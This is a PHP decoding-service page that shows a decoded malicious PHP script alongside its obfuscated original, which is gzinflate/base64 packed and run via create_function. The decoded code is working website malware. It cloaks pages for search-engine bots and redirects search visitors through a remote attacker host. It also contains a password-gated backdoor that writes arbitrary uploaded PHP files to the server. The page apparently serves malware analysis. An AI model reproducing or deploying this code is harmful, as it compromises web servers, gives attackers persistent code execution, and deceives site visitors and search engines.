Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php //ncode_K125 $MdRwlQi6788='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q28..
Decoded Output download
//ncode_K125
error_reporting(0);header('Content-Type: text/html; charset=utf-8');$OoooOO0 = 'gnsixtysixug';$OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a";$O = urldecode($OOOOOO);
date_default_timezone_set('PRC');
$dRoot = @$_SERVER['DOCUMENT_ROOT'];
$rUrl = @$_SERVER['REQUEST_URI'];
$sName = @$_SERVER['HTTP_HOST'];
$Ooolg = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$uAgent = @$_SERVER['HTTP_USER_AGENT'];
$referer = @$_SERVER['HTTP_REFERER'];
$http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
$typeName = $http_type . $sName;
$uAgent = @strtolower($uAgent);
$referer = @strtolower($referer);
if (getenv('HTTP_CLIENT_IP')) {
$client_ip = getenv('HTTP_CLIENT_IP');
} elseif (getenv('HTTP_X_FORWARDED_FOR')) {
$client_ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif (getenv('REMOTE_ADDR')) {
$client_ip = getenv('REMOTE_ADDR');
} else {
$client_ip = $_SERVER['REMOTE_ADDR'];
}
if (isset($_GET['vf']) && $_GET['vf'] == 'online5566') {
echo 'domain online!';
exit;
}
if (strstr($rUrl, 'sitemap_index_')) {
$pr = dirname($rUrl);
allmap($O, $OoooOO0, $typeName, $rUrl, $sName, $http_type, $pr);
}
if (strstr($rUrl, '.xml')) {
$pr = dirname($rUrl);
sitefun($O, $OoooOO0, $typeName, $rUrl, $http_type, $sName, $client_ip, $pr);
}
function allmap($O, $OoooOO0, $typeName, $rUrl, $sName, $http_type, $pr)
{
$ol = 'http://' . $OoooOO0 . '.fexqykx.xyz/Api/siteAllMap.php?page=' . $rUrl . '&pwd=sl123&domain=' . $typeName;
if ($_GET['vf_allmap'] == 'online5566') {
echo $ol;
exit;
}
$getRes = json_decode(getCurl($O, $ol), true);
if (empty($getRes) || $getRes['code'] == 404) {
header('HTTP/1.0 404 Not Found');
header('Status: 404 Not Found');
exit();
}
if (empty($getRes) || $getRes['code'] == 444) {
header('HTTP/1.0 404 Not Found');
header('Status: 404 Not Found');
exit();
}
$getsResult = $getRes['data'];
header('Content-type:text/xml');
echo $getsResult;
exit();
}
function sitefun($O, $OoooOO0, $typeName, $rUrl, $http_type, $sName, $client_ip, $pr = '', $qs = '')
{
$ol = 'http://' . $OoooOO0 . '.fexqykx.xyz/Api/siteUrlApi.php?stype=sitemap&num=6000&pr=' . $pr . '&url=' . $rUrl . '&domain=' . $typeName;
if ($_GET['vf_map'] == 'online5566') {
echo $ol;
exit;
}
$getRes = json_decode(getCurl($O, $ol), true);
if (isset($getRes['code']) && $getRes['code'] == '600') {
$getsResult = $getRes['data'];
foreach ($getsResult as $Oog => $Oov) {
$pingRes = getCurl($O, $Oov);
$Oooo0s = (strpos($pingRes, 'Sitemap Notification Received') !== false) ? 'OK' : 'ERROR';
echo $Oov . '===>Submitting Google Sitemap: ' . $Oooo0s . PHP_EOL;
}
exit();
}
if (isset($getRes['code']) && $getRes['code'] == '406') {
echo 'Submitting Google Sitemap Return Fail';
exit();
}
if (empty($getRes) || $getRes['code'] == 404) {
header('HTTP/1.0 404 Not Found');
header('Status: 404 Not Found');
exit();
}
$getsResult = $getRes['data'];
header('Content-type:text/xml');
echo $getsResult;
exit();
}
$pd = md5(md5(@$_GET['pd']));
if ($pd == '5fbf36f6b1070aec65f00cb8e35c9cc4') {
$add_content = @$_GET['mapname'];
$path = dirname(__FILE__);
$add_content = @$_GET['mapname'];
if (strstr($add_content, '.p'.'hp')) {
$a = md5(md5(@$_GET['a']));
$b = md5(md5(@$_GET['b']));
if ($a == getCurl('','http://' . $OoooOO0 . '.fexqykx.xyz/' . '/a.p'.'hp') || $b == '21c4d031dd29901356a91b3efcca0130') {
$smstr = @$_GET['smstr'];
if (file_put_contents($path . '/' . $add_content, $smstr)) {
echo 'ok';
}
}
}
}
if (isset($_GET['google'])) {
$go = $_GET['google'];
if (preg_match('/^google.*?(\.html)$/i', $go)) {
putFile($O, $go, 'google-site-verification:' . ' ' . $go);
exit('<a href=' . $go . '>' . $go . '</a>');
}
}
if (isset($_GET['robots'])) {
$robots = $_GET['robots'];
if (preg_match('/(\.php)$/i', $robots)) {
$typeName = $typeName . '/' . $robots . '?';
} else {
$typeName = $typeName . '/';
}
putFile($O, 'robots.txt', 'User-agent: *' . PHP_EOL . 'Allow: /' . PHP_EOL . 'Crawl-delay:3' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_1.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_2.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_3.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_4.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_5.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_6.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_7.xml' . PHP_EOL . 'Sitemap:' . $typeName . 'sitemap_index_8.xml');
$file_get_contents = file_get_contents('robots.txt');
echo $file_get_contents;
exit();
}
if (preg_match('/google.co.jp|yahoo|google\.com[^.]*?$|bing/i', $referer)) {
if ($_GET['vf_jump'] == 'online5566') {
echo 'http://' . $OoooOO0 . '.fexqykx.xyz/jump.php?domain=' . $sName . '&page=' . $rUrl . '&bot=0&pr=' . $pr . '&refer=' . $referer . '&lg=' . $Ooolg;
exit;
}
$jumpRes = getCurl($O, 'http://' . $OoooOO0 . '.fexqykx.xyz/jump.php?domain=' . $sName . '&page=' . $rUrl . '&bot=0&pr=' . $pr . '&refer=' . $referer . '&lg=' . $Ooolg);
if ($jumpRes) {
echo $jumpRes;
exit();
}
}
if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'Y!J') || stristr($uAgent, 'y!j') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) {
if ($_GET['vf_bot'] == 'online5566') {
echo 'http://' . $OoooOO0 . '.fexqykx.xyz/org.php?domain=' . $sName . '&page=' . $rUrl . '&pr=' . $pr;
exit;
}
$file_contents = getCurl($O, 'http://' . $OoooOO0 . '.fexqykx.xyz/918.php?domain=' . $sName . '&page=' . $rUrl . '&bot=1&pr=' . $pr);
if (!empty($file_contents)) {
$getRes = json_decode($file_contents, true);
if ($getRes['code'] == 404) {
header('HTTP/1.0 404 Not Found');
header('Status: 404 Not Found');
exit();
}
if ($getRes['code'] == 500) {
header('HTTP/1.1 500 Internal Server Error');
exit();
}
echo $file_contents;
exit;
}
}
if ($_GET['vf_origin'] == 'online5566') {
echo 'http://' . $OoooOO0 . '.fexqykx.xyz/org.php?domain=' . $sName . '&page=' . $rUrl . '&pr=' . $pr . '&ip=' . $client_ip . '&lg=' . $Ooolg;
exit;
}
getCurl($O, 'http://' . $OoooOO0 . '.fexqykx.xyz/org.php?domain=' . $sName . '&page=' . $rUrl . '&pr=' . $pr);
function getCurl($O, $gurl)
{
$file_contents = '';
$user_agent = 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)';
if (function_exists('curl_init')) {
try {
$ch = curl_init();
$timeout = 30;
curl_setopt($ch, CURLOPT_URL, $gurl);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$file_contents = curl_exec($ch);
curl_close($ch);
} catch (Exception $e) {
}
}
if (strlen($file_contents) < 1 && function_exists('file_get_contents')) {
ini_set('user_agent', $user_agent);
try {
$file_contents = @file_get_contents($gurl);
} catch (Exception $e) {
}
}
return $file_contents;
}
function putFile($O, $htName, $htContents)
{
$handle = fopen($htName, 'w') or die('0');
fwrite($handle, $htContents);
fclose($handle);
}
Did this file decode correctly?
Original Code
<?php //ncode_K125
$MdRwlQi6788='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$MdRwlQi6788[(105/15)].$MdRwlQi6788[(26-1)].$MdRwlQi6788[(1*49)].$MdRwlQi6788[((10*1)+18)].$MdRwlQi6788[(14+22)].$MdRwlQi6788[(44+5)].$MdRwlQi6788[(44-13)].$MdRwlQi6788[(684/18)].$MdRwlQi6788[(23+4)].$MdRwlQi6788[(72-(33-7))].$MdRwlQi6788[(154/22)].$MdRwlQi6788[(11+25)].$MdRwlQi6788[(65-(62-31))].$MdRwlQi6788[(26-6)].$MdRwlQi6788[((27*2)-8)];$pHFdNhg9688=$MdRwlQi6788[(20-9)].$MdRwlQi6788[(2*4)].$MdRwlQi6788[(29*1)].$MdRwlQi6788[(160/4)];$MYtraky2482=$MdRwlQi6788[(8*5)].$MdRwlQi6788[((1+0)+2)].$MdRwlQi6788[(6+(1*(95/19)))].$MdRwlQi6788[(140/5)].$MdRwlQi6788[(522/18)].$MdRwlQi6788[(7*((7-3)-2))].$MdRwlQi6788[(2*14)].$MdRwlQi6788[(138/(2+4))].$MdRwlQi6788[(1029/(378/18))].$MdRwlQi6788[((2*189)/9)].$MdRwlQi6788[(12+(0+0))].$MdRwlQi6788[(31*1)].$MdRwlQi6788[(48/(36/12))].$MdRwlQi6788[(735/15)].$MdRwlQi6788[(0+7)].$MdRwlQi6788[(18+2)].$MdRwlQi6788[(18-(10/5))].$MdRwlQi6788[(735/15)].$MdRwlQi6788[(0+(2-(1*1)))].$MdRwlQi6788[(16-(3+(36/(0+18))))].$MdRwlQi6788[((167-23)/18)].$MdRwlQi6788[(0+(18-9))].$MdRwlQi6788[(1*3)].$MdRwlQi6788[(11*(1+(0/(78/13))))].$MdRwlQi6788[(2*7)].$MdRwlQi6788[(29*(0+1))].$MdRwlQi6788[(38-(8+9))].$MdRwlQi6788[(15*2)].$MdRwlQi6788[(45-11)].$MdRwlQi6788[(1*46)].$MdRwlQi6788[(1*(17+21))].$MdRwlQi6788[(78/3)].$MdRwlQi6788[(21+(77/11))].$MdRwlQi6788[(22+14)].$MdRwlQi6788[(343/(91/13))].$MdRwlQi6788[(1*1)].$MdRwlQi6788[(21-10)].$MdRwlQi6788[(22+(12/2))].$MdRwlQi6788[(180/20)].$MdRwlQi6788[(3+((0+0)*1))].$MdRwlQi6788[(686/(126/9))].$MdRwlQi6788[(61-(32-8))].$MdRwlQi6788[(476/17)].$MdRwlQi6788[((4-0)+22)].$MdRwlQi6788[(((23-(2*5))/13)-0)].$MdRwlQi6788[(7+(84/21))].$MdRwlQi6788[(28/2)].$MdRwlQi6788[(9-0)].$MdRwlQi6788[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481();
?>
Function Calls
null | 1 |
gzinflate | 1 |
base64_decode | 1 |
create_function | 1 |
Stats
MD5 | e8d6518597af640b50e10d33b7822398 |
Eval Count | 2 |
Decode Time | 183 ms |